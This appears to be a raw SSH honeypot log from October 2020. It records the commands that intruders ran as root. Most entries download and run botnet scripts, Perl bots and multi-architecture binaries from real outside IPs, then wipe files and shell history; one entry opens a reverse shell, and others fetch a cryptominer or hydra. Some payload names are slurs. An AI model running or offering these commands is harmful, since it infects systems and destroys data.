Exec cat /etc/issue ; rm -rf bot* ; wget 35.222.198.210/bot.pl ; perl bot.pl ; curl -O 35.222.198.210/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c
cat /etc/issue
rm -rf bot*
wget 35.222.198.210/bot.pl
perl bot.pl
curl -O 35.222.198.210/bot.pl
perl bot.pl
rm -rf bot*
history -c

From 51.254.111.244 13-Oct-2020 08:50:03 ssh2 root
Exec uname -a ; 
uname -a

From 193.228.91.123 13-Oct-2020 21:31:39 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.115/hentai.sh; curl -O http://194.180.224.115/hentai.sh; chmod 777 hentai.sh; sh hentai.sh; rm -rf hentai.sh hentai.sh ;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.123/pwnInfect.sh; curl -O http://193.228.91.123/pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp 193.228.91.123 -c get pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp -r pwnInfect2.sh -g 193.228.91.123; chmod 777 pwnInfect2.sh; sh pwnInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 193.228.91.123 pwnInfect1.sh pwnInfect1.sh; sh pwnInfect1.sh; rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://194.180.224.115/hentai.sh
curl -O http://194.180.224.115/hentai.sh
chmod 777 hentai.sh
sh hentai.sh
rm -rf hentai.sh hentai.sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://193.228.91.123/pwnInfect.sh
curl -O http://193.228.91.123/pwnInfect.sh
chmod 777 pwnInfect.sh
sh pwnInfect.sh
tftp 193.228.91.123 -c get pwnInfect.sh
chmod 777 pwnInfect.sh
sh pwnInfect.sh
tftp -r pwnInfect2.sh -g 193.228.91.123
chmod 777 pwnInfect2.sh
sh pwnInfect2.sh
ftpget -v -u anonymous -p anonymous -P 21 193.228.91.123 pwnInfect1.sh pwnInfect1.sh
sh pwnInfect1.sh
rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh
rm -rf *

From 37.49.225.250 14-Oct-2020 04:55:23 ssh2 root
Exec cd /tmp; wget http://107.173.122.103/x86; chmod 777 x86; ./x86 Rooted; rm -rf *
cd /tmp
wget http://107.173.122.103/x86
chmod 777 x86
./x86 Rooted
rm -rf *

From 23.95.186.183 14-Oct-2020 21:55:29 ssh2 root
Exec cd /tmp; wget http://194.87.138.97/bins/hoho.x86; chmod 777 *; ./hoho.x86 gift from Magisk#6297
cd /tmp
wget http://194.87.138.97/bins/hoho.x86
chmod 777 *
./hoho.x86 gift from Magisk#6297

From 125.212.233.74 15-Oct-2020 09:14:51 ssh2 root
Exec cat /etc/issue ; yum install wget -y ; apt install wget -y ; wget 35.238.142.2/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 35.238.142.2/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c
cat /etc/issue
yum install wget -y
apt install wget -y
wget 35.238.142.2/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 35.238.142.2/bot.pl
perl bot.pl
rm -rf bot.pl
history -c

From 209.141.51.59 15-Oct-2020 15:03:35 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.124.40/SnOoPy.sh; chmod 777 *; sh SnOoPy.sh; tftp -g 205.185.124.40 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.124.40/SnOoPy.sh
chmod 777 *
sh SnOoPy.sh
tftp -g 205.185.124.40 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 94.26.126.107 15-Oct-2020 21:01:18 ssh2 root
ls
w
free -g
yum install hydra -y
apt-get install hydra

From 193.105.134.45 15-Oct-2020 21:02:00 ssh2 root
apt-get update
curl -O http://130.0.164.120/scan.jpg

From 159.192.32.4 16-Oct-2020 01:01:57 ssh2 root
Exec scp -r -t ~
scp -r -t ~

From 2.57.122.186 16-Oct-2020 05:28:38 ssh2 root
Exec nc 1 1; rm s.sh; wget http://45.148.10.186/s.sh; busybox wget http://45.148.10.186/s.sh; curl -O http://45.148.10.186/s.sh; chmod 777 *; sh s.sh; cat /etc/issue
nc 1 1
rm s.sh
wget http://45.148.10.186/s.sh
busybox wget http://45.148.10.186/s.sh
curl -O http://45.148.10.186/s.sh
chmod 777 *
sh s.sh
cat /etc/issue

From 51.77.56.9 17-Oct-2020 03:10:18 ssh2 root
Exec uname -a
uname -a
Exec ping 8.8.8.8
ping 8.8.8.8

From 142.11.213.180 17-Oct-2020 03:52:28 ssh2 root
Exec bash -i >& /dev/tcp/142.11.213.180/18244 0>&1
bash -i >
/dev/tcp/142.11.213.180/18244 0>
1

From 142.11.213.180 17-Oct-2020 04:55:06 ssh2 root
pwd
ll /u bin
ls /usr/bin
ls /bin
ls
ls /
uname -a
id
exit

From 142.11.213.180 17-Oct-2020 04:58:21 ssh2 root
Exec scp -t /root
scp -t /root

From 185.239.242.89 17-Oct-2020 15:46:50 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://185.239.242.81/Vividbins.sh; chmod 777 Vividbins.sh; sh Vividbins.sh; tftp 185.239.242.81 -c get Vividtftp1.sh; chmod 777 Vividtftp1.sh; sh Vividtftp1.sh; tftp -r Vividtftp2.sh -g 185.239.242.81; chmod 777 Vividtftp2.sh; sh Vividtftp2.sh; rm -rf Vividbins.sh Vividtftp1.sh Vividtftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://185.239.242.81/Vividbins.sh
chmod 777 Vividbins.sh
sh Vividbins.sh
tftp 185.239.242.81 -c get Vividtftp1.sh
chmod 777 Vividtftp1.sh
sh Vividtftp1.sh
tftp -r Vividtftp2.sh -g 185.239.242.81
chmod 777 Vividtftp2.sh
sh Vividtftp2.sh
rm -rf Vividbins.sh Vividtftp1.sh Vividtftp2.sh
rm -rf *

From 159.65.114.69 18-Oct-2020 04:16:32 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://185.132.53.124/Thorbins.sh; chmod 777 Thorbins.sh; sh Thorbins.sh; tftp 185.132.53.124 -c get Thortftp1.sh; chmod 777 Thortftp1.sh; sh Thortftp1.sh; tftp -r Thortftp2.sh -g 185.132.53.124; chmod 777 Thortftp2.sh; sh Thortftp2.sh; rm -rf Thorbins.sh Thortftp1.sh Thortftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://185.132.53.124/Thorbins.sh
chmod 777 Thorbins.sh
sh Thorbins.sh
tftp 185.132.53.124 -c get Thortftp1.sh
chmod 777 Thortftp1.sh
sh Thortftp1.sh
tftp -r Thortftp2.sh -g 185.132.53.124
chmod 777 Thortftp2.sh
sh Thortftp2.sh
rm -rf Thorbins.sh Thortftp1.sh Thortftp2.sh
rm -rf *

From 193.228.91.110 18-Oct-2020 19:18:20 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.109/Otpzl/7rtya.x86; curl -O http://193.228.91.109/Otpzl/7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 Exploit.x86; rm -rf 7rtya.x86.x86; tftp 193.228.91.109 -c get 7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 TFTP.Exploit.x86;rm -rf 7rtya.x86; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://193.228.91.109/Otpzl/7rtya.x86
curl -O http://193.228.91.109/Otpzl/7rtya.x86
chmod +x 7rtya.x86
./7rtya.x86 Exploit.x86
rm -rf 7rtya.x86.x86
tftp 193.228.91.109 -c get 7rtya.x86
chmod +x 7rtya.x86
./7rtya.x86 TFTP.Exploit.x86
rm -rf 7rtya.x86
history -c

From 193.228.91.123 18-Oct-2020 21:49:19 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.123/pwnInfect.sh; curl -O http://193.228.91.123/pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp 193.228.91.123 -c get pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp -r pwnInfect2.sh -g 193.228.91.123; chmod 777 pwnInfect2.sh; sh pwnInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 193.228.91.123 pwnInfect1.sh pwnInfect1.sh; sh pwnInfect1.sh; rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://193.228.91.123/pwnInfect.sh
curl -O http://193.228.91.123/pwnInfect.sh
chmod 777 pwnInfect.sh
sh pwnInfect.sh
tftp 193.228.91.123 -c get pwnInfect.sh
chmod 777 pwnInfect.sh
sh pwnInfect.sh
tftp -r pwnInfect2.sh -g 193.228.91.123
chmod 777 pwnInfect2.sh
sh pwnInfect2.sh
ftpget -v -u anonymous -p anonymous -P 21 193.228.91.123 pwnInfect1.sh pwnInfect1.sh
sh pwnInfect1.sh
rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh
rm -rf *

From 185.239.242.89 19-Oct-2020 01:15:35 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://185.239.242.171/Bitchbins.sh; chmod 777 Bitchbins.sh; sh Bitchbins.sh; tftp 185.239.242.171 -c get Bitchtftp1.sh; chmod 777 Bitchtftp1.sh; sh Bitchtftp1.sh; tftp -r Bitchtftp2.sh -g 185.239.242.171; chmod 777 Bitchtftp2.sh; sh Bitchtftp2.sh; rm -rf Bitchbins.sh Bitchtftp1.sh Bitchtftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://185.239.242.171/Bitchbins.sh
chmod 777 Bitchbins.sh
sh Bitchbins.sh
tftp 185.239.242.171 -c get Bitchtftp1.sh
chmod 777 Bitchtftp1.sh
sh Bitchtftp1.sh
tftp -r Bitchtftp2.sh -g 185.239.242.171
chmod 777 Bitchtftp2.sh
sh Bitchtftp2.sh
rm -rf Bitchbins.sh Bitchtftp1.sh Bitchtftp2.sh
rm -rf *

From 40.124.33.10 19-Oct-2020 04:12:44 ssh2 root
Exec uname -a & cat /proc/version
uname -a
cat /proc/version

From 45.148.10.65 19-Oct-2020 09:16:03 ssh2 root
Exec nc 1 1; rm s.sh; wget http://45.148.10.186/s.sh; busybox wget http://45.148.10.186/s.sh; curl -O http://45.148.10.186/s.sh; chmod 777 *; sh s.sh
nc 1 1
rm s.sh
wget http://45.148.10.186/s.sh
busybox wget http://45.148.10.186/s.sh
curl -O http://45.148.10.186/s.sh
chmod 777 *
sh s.sh

From 167.99.139.54 19-Oct-2020 14:35:00 ssh2 root
Exec cat /etc/issue ; wget 167.99.139.54/nigga.x86 ; curl -O 167.99.139.54/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 0day.autoroot.x86 ; wget 167.99.139.54/nigga.x32 ; curl -O 167.99.139.54/.x32 ; chmod 777 nigga.x32 ; ./nigga.x32 0day.autoroot ; wget 167.99.139.54/nigga.mips ; curl -O 167.99.139.54/.mips ; chmod 777 nigga.mips ; ./nigga.mips otherbinexecxdlmfao ; wget 167.99.139.54/nigga.arm ; curl -O 167.99.139.54/.arm ; chmod 777 nigga.arm ; ./nigga.arm 0day.autoroot ; wget 167.99.139.54/nigga.arm5 ; curl -O 167.99.139.54/.arm5 ; chmod 777 nigga.arm5 ; ./nigga.arm5 0day.autoroot ; wget 167.99.139.54/nigga.arm6 ; curl -O 167.99.139.54/.arm6 ; chmod 777 nigga.arm6 ; ./nigga.arm6 0day.autoroot ; wget 167.99.139.54/nigga.arm7 ; curl -O 167.99.139.54/.arm7 ; chmod 777 nigga.arm7 ; ./nigga.arm7 0day.autoroot ; wget 167.99.139.54/nigga.ppc ; curl -O 167.99.139.54/.ppc ; chmod 777 nigga.ppc ; ./nigga.ppc 0day.autoroot ; wget 167.99.139.54/nigga.sh4 ; curl -O 167.99.139.54/.sh4 ; chmod 777 nigga.sh4 ; ./nigga.sh4 0day.autoroot ; wget 167.99.139.54/nigga.m68k ; curl -O 167.99.139.54/.m68k ; chmod 777 nigga.m68k ; ./nigga.m68k 0day.autoroot ; rm -rf nigga* ; r9gj 167.99.139.54/bot.pl ; perl bot.pl ; curl -O 167.99.139.54/bot.pl ; perl bot.pl ; rm -rf bot* ; rm -rf bot* ; history -c
cat /etc/issue
wget 167.99.139.54/nigga.x86
curl -O 167.99.139.54/nigga.x86
chmod 777 nigga.x86
./nigga.x86 0day.autoroot.x86
wget 167.99.139.54/nigga.x32
curl -O 167.99.139.54/.x32
chmod 777 nigga.x32
./nigga.x32 0day.autoroot
wget 167.99.139.54/nigga.mips
curl -O 167.99.139.54/.mips
chmod 777 nigga.mips
./nigga.mips otherbinexecxdlmfao
wget 167.99.139.54/nigga.arm
curl -O 167.99.139.54/.arm
chmod 777 nigga.arm
./nigga.arm 0day.autoroot
wget 167.99.139.54/nigga.arm5
curl -O 167.99.139.54/.arm5
chmod 777 nigga.arm5
./nigga.arm5 0day.autoroot
wget 167.99.139.54/nigga.arm6
curl -O 167.99.139.54/.arm6
chmod 777 nigga.arm6
./nigga.arm6 0day.autoroot
wget 167.99.139.54/nigga.arm7
curl -O 167.99.139.54/.arm7
chmod 777 nigga.arm7
./nigga.arm7 0day.autoroot
wget 167.99.139.54/nigga.ppc
curl -O 167.99.139.54/.ppc
chmod 777 nigga.ppc
./nigga.ppc 0day.autoroot
wget 167.99.139.54/nigga.sh4
curl -O 167.99.139.54/.sh4
chmod 777 nigga.sh4
./nigga.sh4 0day.autoroot
wget 167.99.139.54/nigga.m68k
curl -O 167.99.139.54/.m68k
chmod 777 nigga.m68k
./nigga.m68k 0day.autoroot
rm -rf nigga*
r9gj 167.99.139.54/bot.pl
perl bot.pl
curl -O 167.99.139.54/bot.pl
perl bot.pl
rm -rf bot*
rm -rf bot*
history -c

From 35.194.88.89 20-Oct-2020 04:06:44 ssh2 root
Exec cat /etc/issue ; wget http://45.153.203.197/nigga.x86 ; curl -O http://45.153.203.197/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 0day.autoroot.x86 ; wget http://45.153.203.197/nigga ; curl -O http://45.153.203.197/nigga.x32 ; chmod 777 nigga.x32 ; ./nigga.x32 0day.autoroot ; wget http://45.153.203.197/nigga.mips ; curl -O http://45.153.203.197/nigga.mips ; chmod 777 nigga.mips ; ./nigga.mips 0day.autoroot.mips ; wget http://45.153.203.197/nigga.arm ; curl -O http://45.153.203.197/.arm ; chmod 777 nigga.arm ; ./nigga.arm 0day.autoroot ; wget http://45.153.203.197/nigga.arm5 ; curl -O http://45.153.203.197/nigga.arm5 ; chmod 777 nigga.arm5 ; ./nigga.arm5 0day.autoroot ; wget http://45.153.203.197/nigga.arm6 ; curl -O http://45.153.203.197/nigga.arm6 ; chmod 777 nigga.arm6 ; ./nigga.arm6 0day.autoroot ; wget http://45.153.203.197/nigga.arm7 ; curl -O http://45.153.203.197/nigga.arm7 ; chmod 777 nigga.arm7 ; ./nigga.arm7 0day.autoroot ; wget http://45.153.203.197/nigga.ppc ; curl -O http://45.153.203.197/.ppc ; chmod 777 nigga.ppc ; ./nigga.ppc 0day.autoroot ; wget http://45.153.203.197/nigga.sh4 ; curl -O http://45.153.203.197/nigga.sh4 ; chmod 777 nigga.sh4 ; ./nigga.sh4 0day.autoroot ; wget http://45.153.203.197/nigga.m68k ; curl -O http://45.153.203.197/nigga.m68k ; chmod 777 nigga.m68k ; ./nigga.m68k 0day.autoroot ; rm -rf nigga* ; r9gj http://45.153.203.197/bot.pl ; perl bot.pl ; curl -O http://45.153.203.197/bot.pl ; perl bot.pl ; rm -rf bot* ; rm -rf bot* ; history -c
cat /etc/issue
wget http://45.153.203.197/nigga.x86
curl -O http://45.153.203.197/nigga.x86
chmod 777 nigga.x86
./nigga.x86 0day.autoroot.x86
wget http://45.153.203.197/nigga
curl -O http://45.153.203.197/nigga.x32
chmod 777 nigga.x32
./nigga.x32 0day.autoroot
wget http://45.153.203.197/nigga.mips
curl -O http://45.153.203.197/nigga.mips
chmod 777 nigga.mips
./nigga.mips 0day.autoroot.mips
wget http://45.153.203.197/nigga.arm
curl -O http://45.153.203.197/.arm
chmod 777 nigga.arm
./nigga.arm 0day.autoroot
wget http://45.153.203.197/nigga.arm5
curl -O http://45.153.203.197/nigga.arm5
chmod 777 nigga.arm5
./nigga.arm5 0day.autoroot
wget http://45.153.203.197/nigga.arm6
curl -O http://45.153.203.197/nigga.arm6
chmod 777 nigga.arm6
./nigga.arm6 0day.autoroot
wget http://45.153.203.197/nigga.arm7
curl -O http://45.153.203.197/nigga.arm7
chmod 777 nigga.arm7
./nigga.arm7 0day.autoroot
wget http://45.153.203.197/nigga.ppc
curl -O http://45.153.203.197/.ppc
chmod 777 nigga.ppc
./nigga.ppc 0day.autoroot
wget http://45.153.203.197/nigga.sh4
curl -O http://45.153.203.197/nigga.sh4
chmod 777 nigga.sh4
./nigga.sh4 0day.autoroot
wget http://45.153.203.197/nigga.m68k
curl -O http://45.153.203.197/nigga.m68k
chmod 777 nigga.m68k
./nigga.m68k 0day.autoroot
rm -rf nigga*
r9gj http://45.153.203.197/bot.pl
perl bot.pl
curl -O http://45.153.203.197/bot.pl
perl bot.pl
rm -rf bot*
rm -rf bot*
history -c

From 104.237.233.113 20-Oct-2020 16:51:15 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://206.126.81.100/cometome; cat cometome > cm4ejhd; chmod +x cm4ejhd; ./cm4ejhd
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://206.126.81.100/cometome
cat cometome > cm4ejhd
chmod +x cm4ejhd
./cm4ejhd

From 115.126.32.6 20-Oct-2020 20:10:43 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec cat /etc/os-release
cat /etc/os-release

From 125.212.233.74 23-Oct-2020 13:44:11 ssh2 root
Exec cat /etc/issue ; yum install wget -y ; apt install wget -y ; wget 45.153.203.209/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 45.153.203.209/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c
cat /etc/issue
yum install wget -y
Exec cat /etc/issue ; yum install wget -y ; apt install wget -y ; wget 45.153.203.209/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 45.153.203.209/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c
cat /etc/issue
yum install wget -y
apt install wget -y
wget 45.153.203.209/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 45.153.203.209/bot.pl
perl bot.pl
rm -rf bot.pl
history -c
apt install wget -y
wget 45.153.203.209/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 45.153.203.209/bot.pl
perl bot.pl
rm -rf bot.pl
history -c

From 193.228.91.123 24-Oct-2020 10:46:54 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.142/hentai.sh; curl -O http://194.180.224.142/hentai.sh; chmod 777 hentai.sh; sh hentai.sh; tftp 194.180.224.142 -c get hentai.sh; chmod 777 hentai.sh; sh hentai.sh; tftp -r hentai2.sh -g 194.180.224.142; chmod 777 hentai2.sh; sh hentai2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.180.224.142 hentai1.sh hentai1.sh; sh hentai1.sh; rm -rf hentai.sh hentai.sh hentai2.sh hentai1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://194.180.224.142/hentai.sh
curl -O http://194.180.224.142/hentai.sh
chmod 777 hentai.sh
sh hentai.sh
tftp 194.180.224.142 -c get hentai.sh
chmod 777 hentai.sh
sh hentai.sh
tftp -r hentai2.sh -g 194.180.224.142
chmod 777 hentai2.sh
sh hentai2.sh
ftpget -v -u anonymous -p anonymous -P 21 194.180.224.142 hentai1.sh hentai1.sh
sh hentai1.sh
rm -rf hentai.sh hentai.sh hentai2.sh hentai1.sh
rm -rf *

From 2.57.122.186 24-Oct-2020 21:29:04 ssh2 root
Exec nc 1 1; rm s.sh; wget http://45.148.10.186/s.sh; busybox wget http://45.148.10.186/s.sh; curl -O http://45.148.10.186/s.sh; chmod 777 *; sh s.sh; cat /etc/issue; pkill iman; pkill xmrigMiner; pkill xmrig; pkill cnrig;
nc 1 1
rm s.sh
wget http://45.148.10.186/s.sh
busybox wget http://45.148.10.186/s.sh
curl -O http://45.148.10.186/s.sh
chmod 777 *
sh s.sh
cat /etc/issue
pkill iman
pkill xmrigMiner
pkill xmrig
pkill cnrig

From 103.144.200.5 26-Oct-2020 02:44:32 ssh2 root
Exec wget http://88.218.16.87/wash.sh; curl -O http://88.218.16.87/wash.sh; chmod 777 wash.sh; sh wash.sh
wget http://88.218.16.87/wash.sh
curl -O http://88.218.16.87/wash.sh
chmod 777 wash.sh
sh wash.sh

From 185.239.242.89 26-Oct-2020 09:09:00 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://45.145.185.82/Vividbins.sh; chmod 777 Vividbins.sh; sh Vividbins.sh; tftp 45.145.185.82 -c get Vividtftp1.sh; chmod 777 Vividtftp1.sh; sh Vividtftp1.sh; tftp -r Vividtftp2.sh -g 45.145.185.82; chmod 777 Vividtftp2.sh; sh Vividtftp2.sh; rm -rf Vividbins.sh Vividtftp1.sh Vividtftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://45.145.185.82/Vividbins.sh
chmod 777 Vividbins.sh
sh Vividbins.sh
tftp 45.145.185.82 -c get Vividtftp1.sh
chmod 777 Vividtftp1.sh
sh Vividtftp1.sh
tftp -r Vividtftp2.sh -g 45.145.185.82
chmod 777 Vividtftp2.sh
sh Vividtftp2.sh
rm -rf Vividbins.sh Vividtftp1.sh Vividtftp2.sh
rm -rf *

From 2.57.122.195 26-Oct-2020 16:24:31 ssh2 root
Exec nc 1 1;cat /etc/issue; wget https://nasapaul.com/cnrig; ./cnrig;
nc 1 1
cat /etc/issue
wget https://nasapaul.com/cnrig
./cnrig

From 35.197.1.84 26-Oct-2020 21:53:06 ssh2 root
Exec cat /etc/issue ; wget 35.247.147.161/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 35.247.147.161/bot.pl ; perl bot.pl ; history -c ; rm -rf bot.pl
cat /etc/issue
wget 35.247.147.161/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 35.247.147.161/bot.pl
perl bot.pl
history -c
rm -rf bot.pl

From 46.101.135.250 27-Oct-2020 01:13:09 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://67.205.177.215/Cipher777.sh; chmod 777 Cipher777.sh; sh Cipher777.sh Cipher; tftp 67.205.177.215 -c get Cipher777tftp1.sh; chmod 777 Cipher777tftp1.sh; sh Cipher777tftp1.sh Cipher; tftp -r Cipher777tftp2.sh -g 67.205.177.215; chmod 777 Cipher777tftp2.sh; sh Cipher777tftp2.sh Cipher; rm -rf Cipher777.sh Cipher777tftp1.sh Cipher777tftp2.sh; rm -rf *;history -c
cd /tmp || cd /run || cd /
wget http://67.205.177.215/Cipher777.sh
chmod 777 Cipher777.sh
sh Cipher777.sh Cipher
tftp 67.205.177.215 -c get Cipher777tftp1.sh
chmod 777 Cipher777tftp1.sh
sh Cipher777tftp1.sh Cipher
tftp -r Cipher777tftp2.sh -g 67.205.177.215
chmod 777 Cipher777tftp2.sh
sh Cipher777tftp2.sh Cipher
rm -rf Cipher777.sh Cipher777tftp1.sh Cipher777tftp2.sh
rm -rf *
history -c

From 45.148.10.186 27-Oct-2020 01:58:29 ssh2 root
Exec nc 1 1; rm s.sh; wget http://45.148.10.186/s.sh; busybox wget http://45.148.10.186/s.sh; curl -O http://45.148.10.186/s.sh; chmod 777 *; sh s.sh;
nc 1 1
rm s.sh
wget http://45.148.10.186/s.sh
busybox wget http://45.148.10.186/s.sh
curl -O http://45.148.10.186/s.sh
chmod 777 *
sh s.sh

From 209.141.51.59 27-Oct-2020 08:21:02 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.14.224.170/h3lln3t.sh; curl -O http://45.14.224.170/h3lln3t.sh; chmod 777 h3lln3t.sh; sh h3lln3t.sh; tftp 45.14.224.170 -c get h3lln3t.sh; chmod 777 h3lln3t.sh; sh h3lln3t.sh; tftp -r h3lln3t2.sh -g 45.14.224.170; chmod 777 h3lln3t2.sh; sh h3lln3t2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.14.224.170 h3lln3t1.sh h3lln3t1.sh; sh h3lln3t1.sh; rm -rf h3lln3t.sh h3lln3t.sh h3lln3t2.sh h3lln3t1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.14.224.170/h3lln3t.sh
curl -O http://45.14.224.170/h3lln3t.sh
chmod 777 h3lln3t.sh
sh h3lln3t.sh
tftp 45.14.224.170 -c get h3lln3t.sh
chmod 777 h3lln3t.sh
sh h3lln3t.sh
tftp -r h3lln3t2.sh -g 45.14.224.170
chmod 777 h3lln3t2.sh
sh h3lln3t2.sh
ftpget -v -u anonymous -p anonymous -P 21 45.14.224.170 h3lln3t1.sh h3lln3t1.sh
sh h3lln3t1.sh
rm -rf h3lln3t.sh h3lln3t.sh h3lln3t2.sh h3lln3t1.sh
rm -rf *

From 193.228.91.108 27-Oct-2020 11:27:54 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.109/Otpzl/7rtya.x86; curl -O http://193.228.91.109/Otpzl/7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 Exploit.x86; rm -rf 7rtya.x86; tftp 193.228.91.109 -c get 7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 TFTP.Exploit.x86;rm -rf 7rtya.x86; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://193.228.91.109/Otpzl/7rtya.x86
curl -O http://193.228.91.109/Otpzl/7rtya.x86
chmod +x 7rtya.x86
./7rtya.x86 Exploit.x86
rm -rf 7rtya.x86
tftp 193.228.91.109 -c get 7rtya.x86
chmod +x 7rtya.x86
./7rtya.x86 TFTP.Exploit.x86
rm -rf 7rtya.x86
history -c

From 34.65.109.41 27-Oct-2020 19:47:23 ssh2 root
Exec cat /etc/issue ; wget 45.153.203.209/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 45.153.203.209/bot.pl ; perl bot.pl ; history -c ; rm -rf bot.pl
cat /etc/issue
wget 45.153.203.209/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 45.153.203.209/bot.pl
perl bot.pl
history -c
rm -rf bot.pl

From 34.126.97.229 28-Oct-2020 00:19:02 ssh2 root
Exec cat /etc/issue ; wget https://transfer.sh/6iHN7/bot.pl/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O https://transfer.sh/6iHN7/bot.pl/bot.pl ; perl bot.pl ; history -c ; rm -rf bot.pl
cat /etc/issue
wget https://transfer.sh/6iHN7/bot.pl/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O https://transfer.sh/6iHN7/bot.pl/bot.pl
perl bot.pl
history -c
rm -rf bot.pl

From 185.239.242.89 28-Oct-2020 04:56:11 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.153.203.172/8UsA.sh; curl -O http://45.153.203.172/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 45.153.203.172 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 45.153.203.172; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.153.203.172 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.153.203.172/8UsA.sh
curl -O http://45.153.203.172/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 45.153.203.172 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 45.153.203.172
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 45.153.203.172 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 34.78.38.251 28-Oct-2020 08:42:23 ssh2 root
Exec cat /etc/issue ; wget 35.203.175.171/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 35.203.175.171/bot.pl ; perl bot.pl ; history -c ; rm -rf bot.pl
cat /etc/issue
wget 35.203.175.171/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 35.203.175.171/bot.pl
perl bot.pl
history -c
rm -rf bot.pl

From 101.96.89.207 29-Oct-2020 06:13:06 ssh2 root
